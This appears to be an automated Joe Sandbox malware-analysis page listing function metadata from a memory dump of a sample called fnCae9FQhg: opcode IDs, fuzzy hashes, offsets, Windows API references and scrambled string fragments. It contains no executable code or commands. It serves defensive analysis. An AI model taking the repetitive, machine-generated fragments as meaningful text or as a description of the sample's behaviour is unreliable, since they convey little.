                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: +$e$ n l$%r?p$<j:h$=:$DD$N~4|$Xs$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
                                                                                                                                                                • API String ID: 0-3233044194
                                                                                                                                                                • Opcode ID: 4eead51f033f302dbd3cf6a8f88feac69b80587dbb83cbf95383d1105f1e4da5
                                                                                                                                                                • Instruction ID: e421a2c5a4d8f3e2ac99a7b21652312679117c159eb5f22db854593ada5fd751
                                                                                                                                                                • Opcode Fuzzy Hash: 4eead51f033f302dbd3cf6a8f88feac69b80587dbb83cbf95383d1105f1e4da5
                                                                                                                                                                • Instruction Fuzzy Hash: 7AC20DB560C3848AD334CF54C852BDFBAF2FB82304F00892DD5E96B255D7B5464A8B9B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: +$e$ n l$%r?p$<j:h$=:$DD$N~4|$Xs$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
                                                                                                                                                                • API String ID: 0-3233044194
                                                                                                                                                                • Opcode ID: 0bf456de444dc9f530ea5a70a16c0d2ec2a72dd4553b550d56f70b5fa92ee34d
                                                                                                                                                                • Instruction ID: 090a6595e39ccf77a54f65e68aa38eb1934611c8d472756ac851a530e1c9c711
                                                                                                                                                                • Opcode Fuzzy Hash: 0bf456de444dc9f530ea5a70a16c0d2ec2a72dd4553b550d56f70b5fa92ee34d
                                                                                                                                                                • Instruction Fuzzy Hash: FBC20CB560C3848AD334CF54C452BDFBAF2FB82300F00892DD5E96B255D7B5464A8B9B
                                                                                                                                                                APIs
                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL ref: 009D1EC3
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                • String ID: 8$?$L$[$^$a$p$y$|
                                                                                                                                                                • API String ID: 237503144-3949209405
                                                                                                                                                                • Opcode ID: 55e95a12534d7e969db8b35a731271301d47a9870e03f3cdaf2f26e053e771a1
                                                                                                                                                                • Instruction ID: 9200f6bc3c5407157998620f235c10097af54a348940fedde0f7795ada966a82
                                                                                                                                                                • Opcode Fuzzy Hash: 55e95a12534d7e969db8b35a731271301d47a9870e03f3cdaf2f26e053e771a1
                                                                                                                                                                • Instruction Fuzzy Hash: A912917190C7808BC364DF38C4917AEBBE1AFD5324F148E2EE4D987392D63898459B43
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: *,-"$3F&D$JyTK$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$L4$L4
                                                                                                                                                                • API String ID: 0-2746398225
                                                                                                                                                                • Opcode ID: 1feb7d51a913e0125c7b86afb29fb2686dbfbddf0e4a4789cec1af5704e53ec1
                                                                                                                                                                • Instruction ID: 00fdfc8d4aa101ef81ecd60f22a000c1e0b0ab076ec393060a902333236a974f
                                                                                                                                                                • Opcode Fuzzy Hash: 1feb7d51a913e0125c7b86afb29fb2686dbfbddf0e4a4789cec1af5704e53ec1
                                                                                                                                                                • Instruction Fuzzy Hash: 3C4222B2A083518FC724CF28D8917ABB7E6BBD5304F19893DD4D98B356DB359806CB42
                                                                                                                                                                APIs
                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(?), ref: 009CFDFC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                • String ID: #$6$=$\$g$m$w$x
                                                                                                                                                                • API String ID: 237503144-139252074
                                                                                                                                                                • Opcode ID: f3de87819a80d464dc4e1519afa4cc17527e5862fe14c079d5ac7146afb7e546
                                                                                                                                                                • Instruction ID: 3f6df46db5b4dd194f7b154ab768b68b0b20db9e699272838ac3a99996cfcf76
                                                                                                                                                                • Opcode Fuzzy Hash: f3de87819a80d464dc4e1519afa4cc17527e5862fe14c079d5ac7146afb7e546
                                                                                                                                                                • Instruction Fuzzy Hash: 40729332A1D7908BD324DA38C85579FBAD2ABD5320F198B3DE4E9C73D2D67889018743
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: !A/C$$Y)[$1Q>S$DE$O=q?$P-X/$S%g'$Z)o+$f!V#$r$s1z3$}5x7$}9F;
                                                                                                                                                                • API String ID: 0-3413813421
                                                                                                                                                                • Opcode ID: 8499bc07a51b97d20382a93ece31e83547fa45c0dd5f8d0df3faabba4cb0e125
                                                                                                                                                                • Instruction ID: 153fe588ea8799aa6f862de6524b1a2738b4c6a54f570e5399ad3bbf6bbb3206
                                                                                                                                                                • Opcode Fuzzy Hash: 8499bc07a51b97d20382a93ece31e83547fa45c0dd5f8d0df3faabba4cb0e125
                                                                                                                                                                • Instruction Fuzzy Hash: 22C1EDB0A0C380CFD724CF65D851B6BBBF1EF81344F04496CE1998B2A2D7399906CB96
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: "nl$#M%O$*"$4UW$\701$\701$a`|v$wt$AC$MO$pv$uvw
                                                                                                                                                                • API String ID: 0-635595044
                                                                                                                                                                • Opcode ID: de26b92127d6bff8c828edc1a42604e292ee930484d4aabf9d80e7680ba710d3
                                                                                                                                                                • Instruction ID: 77a1f844b6d9c4ab677fe2952b06017227e481ce778e8920a6703d9d9d739067
                                                                                                                                                                • Opcode Fuzzy Hash: de26b92127d6bff8c828edc1a42604e292ee930484d4aabf9d80e7680ba710d3
                                                                                                                                                                • Instruction Fuzzy Hash: 6F02E0B6A4C3018BC704DF68D8916ABBBF1EFD1314F19892DF4C59B351D2389A09CB96
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 009FE110: LdrInitializeThunk.NTDLL(00A012FB,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 009FE13E
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 009DA21A
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 009DA2AB
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                • String ID: VX$_^]\$_^]\$_^]\
                                                                                                                                                                • API String ID: 764372645-2822990893
                                                                                                                                                                • Opcode ID: 9225faeb7a7e541e4996a06dc2f3acfcd06b00eabece508951899598fba26856
                                                                                                                                                                • Instruction ID: 8971042992ed1c7c88a97cc93f4a39c5affac24e2f5ae3912f418e1481e51ef9
                                                                                                                                                                • Opcode Fuzzy Hash: 9225faeb7a7e541e4996a06dc2f3acfcd06b00eabece508951899598fba26856
                                                                                                                                                                • Instruction Fuzzy Hash: 89A235B67493005BD718CB34CC9176BBBA7ABD1314F2DC92EE595873A2D636DC028B42
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: AL$CPm5$O}nl$Yxqs$f>mI$hch&$t|f$uvqs$
                                                                                                                                                                • API String ID: 0-1556426300
                                                                                                                                                                • Opcode ID: 7c60885576c2bfe89b971a4f9d789989f3e158303ce7919ce6e3ffb675059ad9
                                                                                                                                                                • Instruction ID: db0a12a0ab910860257bc21d6ec08dd3751f3497fa8e93cc251a9bf5840d1498
                                                                                                                                                                • Opcode Fuzzy Hash: 7c60885576c2bfe89b971a4f9d789989f3e158303ce7919ce6e3ffb675059ad9
                                                                                                                                                                • Instruction Fuzzy Hash: DA52447050C3918FC721DF28C85166EBBE1AF95314F188A7EE8E59B392D735C906CB92
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 47:$ " $220$AZDH$UXWZ$nV[k$pMC@$:/'
                                                                                                                                                                • API String ID: 0-3711047884
                                                                                                                                                                • Opcode ID: 9926d0839867c47688e7bb7e6673ecc1942e53d425b94c295efb0dbb40826a84
                                                                                                                                                                • Instruction ID: 63282cd948bc9fd68240d85b0fdf1ab32f4e7786b5fa9ebb51cf25b8c91f2342
                                                                                                                                                                • Opcode Fuzzy Hash: 9926d0839867c47688e7bb7e6673ecc1942e53d425b94c295efb0dbb40826a84
                                                                                                                                                                • Instruction Fuzzy Hash: 56C18AB4800B819FD321EF3AD5467A3BFF0AB06300F444A5ED4EA4B695E734645ACBD6
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: X$X$Y$Y$Z$Z$q$}
                                                                                                                                                                • API String ID: 0-540668698
                                                                                                                                                                • Opcode ID: 92023e53b11931f45d32f5ecdcf6ed19e405229557f51b4b8869f4eaeec5f576
                                                                                                                                                                • Instruction ID: a84ac403d05c44e937e1d4ea545a058d44edccccfa50f57a9dc4d8d74dbaa209
                                                                                                                                                                • Opcode Fuzzy Hash: 92023e53b11931f45d32f5ecdcf6ed19e405229557f51b4b8869f4eaeec5f576
                                                                                                                                                                • Instruction Fuzzy Hash: 28A12A23F087D94ADF1189BC8C542FFAFA25BA6220F1D8779C9F1E73C2D56949028361
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: _^]\
                                                                                                                                                                • API String ID: 0-3116432788
                                                                                                                                                                • Opcode ID: 843e37d9ab134c81549cb916b3e27afc2e033866521034bed1ebcbd20c42e599
                                                                                                                                                                • Instruction ID: b8a783c890f790c3a625597f109a399e62bed36b2e6b7a6ccbec34dd801fdd58
                                                                                                                                                                • Opcode Fuzzy Hash: 843e37d9ab134c81549cb916b3e27afc2e033866521034bed1ebcbd20c42e599
                                                                                                                                                                • Instruction Fuzzy Hash: 598225715083518BC724CF68C8917ABF7E2EFC9314F198A6DE8D59B3A5E7348806CB52
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID: /$BVLm$_^]\$_^]\$_^]\$_^]\$_^]\
                                                                                                                                                                • API String ID: 2994545307-2892575238
                                                                                                                                                                • Opcode ID: da244dc577d42ada4108b801cff6081b19049541eb4d1ca0f7ea463a16b90144
                                                                                                                                                                • Instruction ID: 7da9f22d3aed287b2055ed8b4127ef38232d0f40d0e9ae648d61419ee41adc2b
                                                                                                                                                                • Opcode Fuzzy Hash: da244dc577d42ada4108b801cff6081b19049541eb4d1ca0f7ea463a16b90144
                                                                                                                                                                • Instruction Fuzzy Hash: 983237B16483418FD718DB38C89177BB7A6FBE2314F19892DD1D6872E2DB3589038B52
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: ;"I$,6.2$A$FM$PTvu$WAg.$cbrn
                                                                                                                                                                • API String ID: 0-3116088196
                                                                                                                                                                • Opcode ID: c9e207116f0d0e1d3c010b878aae285ff6d7d53aed98aae9b503113e93668ba5
                                                                                                                                                                • Instruction ID: 98e7f1337befd0fcbfcf01772b8b10da78dcb6c06afc59018a0a4ebcdb2c4120
                                                                                                                                                                • Opcode Fuzzy Hash: c9e207116f0d0e1d3c010b878aae285ff6d7d53aed98aae9b503113e93668ba5
                                                                                                                                                                • Instruction Fuzzy Hash: 6DC12671A0C3D58BD322CF6994A075BFFD19FD6310F094AACE8D51B386D275890ACB92
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2571061633.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571080914.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571104850.0000000000BDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571145095.0000000000C0D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571165129.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: +$\$]$^$_$_\]^_
                                                                                                                                                                • API String ID: 0-648900778
                                                                                                                                                                • Opcode ID: 7993d95bfa2ffedf33e50c45dfa4db40e4af51146748282135924c35ecfbed6b
                                                                                                                                                                • Instruction ID: 47bc47d223c539bfdc11de3c61d4cbbe202b37392b86fa25c3b0ab7a152e6e5d
                                                                                                                                                                • Opcode Fuzzy Hash: 7993d95bfa2ffedf33e50c45dfa4db40e4af51146748282135924c35ecfbed6b
                                                                                                                                                                • Instruction Fuzzy Hash: D012B572A4C7408BC764DF38C8953AEBBD2ABD5320F158A2EE4E9C73D1D67588458B43
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: >$HYZF$HYZF$UMAG$Y2^0$]><
                                                                                                                                                                • API String ID: 0-2666672646
                                                                                                                                                                • Opcode ID: 6d8bf98981f815bed05bf121ec757f769c4cae8cdf817a31888025b0123f191a
                                                                                                                                                                • Instruction ID: a2d725a086655d7c4bda39d4cb3cd98c10b6048c26a2eff906dbb6037dc83c07
                                                                                                                                                                • Opcode Fuzzy Hash: 6d8bf98981f815bed05bf121ec757f769c4cae8cdf817a31888025b0123f191a
                                                                                                                                                                • Instruction Fuzzy Hash: 84E15A76B4C3544BC324CF6888417AFBBE69FC1304F18892CE9E99B385DA79C9058787
                                                                                                                                                                APIs
                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 009E84BD
                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 009E85B4
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                • String ID: LF7Y$_^]\
                                                                                                                                                                • API String ID: 237503144-3688711800
                                                                                                                                                                • Opcode ID: 1dae4cdcd99cfc72f3a4eba250cbbce0d96536229bbbe4042c6c8815459ab944
                                                                                                                                                                • Instruction ID: 2b6ea2d2171278e7202bdbb2fb03aea209d3d8243a0f53b53dea969d7a99ef63
                                                                                                                                                                • Opcode Fuzzy Hash: 1dae4cdcd99cfc72f3a4eba250cbbce0d96536229bbbe4042c6c8815459ab944
                                                                                                                                                                • Instruction Fuzzy Hash: CE22F171A08381CFD325CF69D88072FB7E5BF85310F194A6CE999572A1D735AD02CB52
                                                                                                                                                                APIs
                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 009E84BD
                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 009E85B4
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                • String ID: LF7Y$_^]\
                                                                                                                                                                • API String ID: 237503144-3688711800
                                                                                                                                                                • Opcode ID: 68fcb83910ca28584f4c1f3e63d6504dcf99b6388a46c16a5ad63ac70dbc5872
                                                                                                                                                                • Instruction ID: ee16ec50d45946d5321daef53c70f51f3a77072cf79793c7d01d29c3767ac048
                                                                                                                                                                • Opcode Fuzzy Hash: 68fcb83910ca28584f4c1f3e63d6504dcf99b6388a46c16a5ad63ac70dbc5872
                                                                                                                                                                • Instruction Fuzzy Hash: 5512E071A08381CFD325CF69D88072FBBE1BF89310F194A6CE999572A1D735AD42CB52
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID: _^]\$_^]\$f$fiP$jiP
                                                                                                                                                                • API String ID: 2994545307-2734853458
                                                                                                                                                                • Opcode ID: 9cf6de65e5e87d38eeadb705cc2c7805e25d210cdee97bd3840db54adb9724ea
                                                                                                                                                                • Instruction ID: c7f75ca64b8a49cc30b42090d5f2d19830f9ecc94b5f635c58e2851b8965deba
                                                                                                                                                                • Opcode Fuzzy Hash: 9cf6de65e5e87d38eeadb705cc2c7805e25d210cdee97bd3840db54adb9724ea
                                                                                                                                                                • Instruction Fuzzy Hash: A422F6B160D3069FD718CF28C890B3FBBE7ABD9314F188A2CE19597395D631D8419B92
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: _^]\_^]\$uYD\$PV$X^$\R
                                                                                                                                                                • API String ID: 0-2314179683
                                                                                                                                                                • Opcode ID: d672811b5f98e8359570741bf06cf83dadef9948c287012e2f2a4059eb4e8dc5
                                                                                                                                                                • Instruction ID: 121d19919eaa1bd5157b969f7b858ab66016819b8f82c982f36c1a16c49c3ae3
                                                                                                                                                                • Opcode Fuzzy Hash: d672811b5f98e8359570741bf06cf83dadef9948c287012e2f2a4059eb4e8dc5
                                                                                                                                                                • Instruction Fuzzy Hash: 6FF1DCB1E04318CFDF14CFA9D881AAEBBB1FB49310F18856CD642AB351D775A942CB91
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: "_,Y$.[TU$;GsA$=K0E$pCj]
                                                                                                                                                                • API String ID: 0-1171452581
                                                                                                                                                                • Opcode ID: 6725368be23861a04fa01251711131c8e31ad3a0c8cabe285da1f862b5347355
                                                                                                                                                                • Instruction ID: 2bd3bd963314fa13077b6f075d057d5fb778120313ed4fad0a7317cecb64c9dc
                                                                                                                                                                • Opcode Fuzzy Hash: 6725368be23861a04fa01251711131c8e31ad3a0c8cabe285da1f862b5347355
                                                                                                                                                                • Instruction Fuzzy Hash: 0B9124B16083409BD710DF25C891B67B3F9EF85714F18882CF88A8B292E775ED05C752
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
